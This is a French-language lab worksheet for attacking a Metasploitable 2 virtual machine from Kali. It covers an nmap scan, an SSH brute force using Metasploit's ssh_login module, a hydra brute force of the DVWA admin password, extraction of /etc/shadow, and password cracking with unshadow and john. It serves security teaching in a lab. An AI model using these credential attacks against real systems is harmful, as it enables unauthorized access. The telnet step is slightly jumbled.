TP : Exploitation d'une Machine Metasploit 2
Objectifs
• Identifier l'adresse IP de la machine Metasploit 2.
• Réaliser un scan Nmap depuis la machine Kali.
• Récupérer les identifiants de serveur ssh de metasploit 2
• Récupérer les identifiants de la page web DVWA
• Exploiter telnet
Étapes du TP
A. Configuration et identification de l'adresse IP
1. Démarrer les deux machines virtuelles sur VirtualBox.
2. Sur la machine Metasploit 2, ouvrez une console et tapez : ifconfig (Notez
l'adresse IP associée à l'interface réseau)
B. Scan de ports avec Nmap
1. Sur la machine Kali, ouvrez un terminal.
2. Effectuez un scan Nmap sur l'adresse IP de la machine Metasploit 2
3. Identifiez les services actifs
4. Identification et exploitation du service SSH
5. Lancer Metasploit Framework via msfconsole
6. Lancer les commandes suivantes :
• use auxiliary/scanner/ssh/ssh_login
• set RHOSTS @ip de la cible
• set USERNAME msfadmin
• set PASS_FILE /usr/share/wordlists/[Link]
• set THREADS 5
• run
7. Vérifier si le port 80 est ouvert, si oui suivre les étapes suivantes :
• Accéder à la page web [Link]
• Cliquer sur le lien DVWA
• Faire force brute pour trouver le mot de passe de l’utilisateur admin en
utilisant hydra à partir du dictionnaire des mots de passe
/usr/share/wordlists/[Link]
8. Récupération des fichiers "/etc/passwd" et "/etc/shadow"
9. Copier les fichiers dans passwd et shadow
10. Utiliser la commande unshadow pour fusionner les deux fichiers et mettre le
résultat dans un fichier [Link]
11. Se connecter via telnet à la machine metasploit 2
cut -d " " -f1 /usr/share/seclists/Passwords/Malware/[Link]| head
cut -d " " -f2 /usr/share/seclists/Passwords/Malware/[Link] >
[Link]
12. Utiliser la commande john pour récupérer le mot de passe
John [Link] –w=[Link]